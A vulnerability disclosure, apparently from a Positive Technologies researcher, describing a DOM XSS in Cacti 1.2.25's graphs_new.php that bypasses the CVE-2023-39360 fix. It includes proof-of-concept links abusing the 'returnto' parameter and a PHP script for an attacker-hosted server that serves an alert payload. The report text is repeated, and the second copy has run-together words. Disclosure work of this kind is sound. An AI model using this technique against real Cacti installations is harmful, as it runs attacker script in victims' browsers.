Cross-Site Scripting (XSS) DOM
Product: Cacti
Version: 1.2.25
Description: Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack.
Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is
the graphs_new.php. Impact of the vulnerability - execution of arbitrary javascript code in
the attacked user's browser.
Mitigation: Sanitization of data transferred from an external source.
Research
The report for the patched vulnerability (CVE-2023-39360) has been reviewed.
When the specified link is embedded in the advisor, the attack will not occur, because
some special characters are filtered, for example: ", ', (, ), <, >
Listing 1. PoC for fixed vulnerability (CVE-2023-39360)
http://***.***.*.174:8080/cacti/graphs_new.php?returnto=javascript:alert(location
.hash.substring(1))//host.php#XSS
Figure 1. Demonstration of the CVE-2023-39360 fix
However, there is a way to perform a full-fledged DOM XSS attack.
First, the attacker must place the following script on his server – http://***.***.*.87.
Listing 2. Placing the script on the attacker's server
<?php
header('Access-Control-Allow-Origin: *');
echo '<img src=1 onerror=alert(document.domain)>';
?>
Figure 2. Demonstration of the request-response from the attacker's server
Secondly, the attacker prepares the next link and transmits it to the attacked –
***.***.*.174.
Listing 3. Link demonstrating PoC vulnerabilities
http://***.***.*.174:8080/cacti/graphs_new.php?returnto=//***.***.*.87/index.php?
//host.php
Figure 3. Demonstration of the display of the returnto parameter when clicking on a link
It can be seen that the embedded load does not contain special characters that are
sanitized. When you click on the “Cancel” button, the cactiReturnTo function will be called
with the transferred payload.
Figure 4. Calling the cactiReturnTo function with the passed reference in the returnto parameter
In the cactiReturnTo function on line 731, the loadPageNoHeader function is called,
where the link from the user is passed.
Figure 5. Calling the loadPageNoHeader function, where the first parameter is controlled by the user
In the loadPageNoHeader function on line 2380, an ajax request is made using the link
passed from the user. In case of success, on lines 2382, 2396, 2407 a dangerous .html function
will be used. The function does not sanitize the passed value, which leads to a DOM XSS attack.
When you click on the "Cancel" button, a DOM XSS attack is performed.
Figure 6. When you click the Cancel button, a Reflected XSS attack is performed
Researcher: Aleksey Solovev (Positive Technologies)
012git012 Reporter
Cross-Site Scripting (XSS) DOM
Product: Cacti
Version: 1.2.25
Description: Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack.
Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is
the
graphs_new.php. Impact of the vulnerability - execution of arbitrary javascript code inthe attacked user's browser.
Mitigation: Sanitization of data transferred from an external source.
Research
The report for the patched vulnerability (CVE-2023-39360) has been reviewed.
When the specified link is embedded in the advisor, the attack will not occur, because
some special characters are filtered, for example:
", ', (, ), <, >Listing 1. PoC for fixed vulnerability (CVE-2023-39360)
Figure 1. Demonstration of the CVE-2023-39360 fix
However, there is a way to perform a full-fledged DOM XSS attack.
First, the attacker must place the following script on his server –
http://***.***.*.87.Listing 2. Placing the script on the attacker's server
Figure 2. Demonstration of the request-response from the attacker's server
Secondly, the attacker prepares the next link and transmits it to the attacked –
***.***.*.174.Listing 3. Link demonstrating PoC vulnerabilities
Figure 3. Demonstration of the display of the returnto parameter when clicking on a link
It can be seen that the embedded load does not contain special characters that are
sanitized. When you click on the “Cancel” button, the
cactiReturnTofunction will be calledwith the transferred payload.
Figure 4. Calling the
cactiReturnTofunction with the passed reference in thereturntoparameterIn the
cactiReturnTofunction on line 731, theloadPageNoHeaderfunction is called,where the link from the user is passed.
Figure 5. Calling the
loadPageNoHeaderfunction, where the first parameter is controlled by the userIn the
loadPageNoHeaderfunction on line 2380, an ajax request is made using the linkpassed from the user. In case of success, on lines 2382, 2396, 2407 a dangerous
.htmlfunctionwill be used. The function does not sanitize the passed value, which leads to a DOM XSS attack.
When you click on the "Cancel" button, a DOM XSS attack is performed.
Figure 6. When you click the Cancel button, a Reflected XSS attack is performed
Researcher: Aleksey Solovev (Positive Technologies)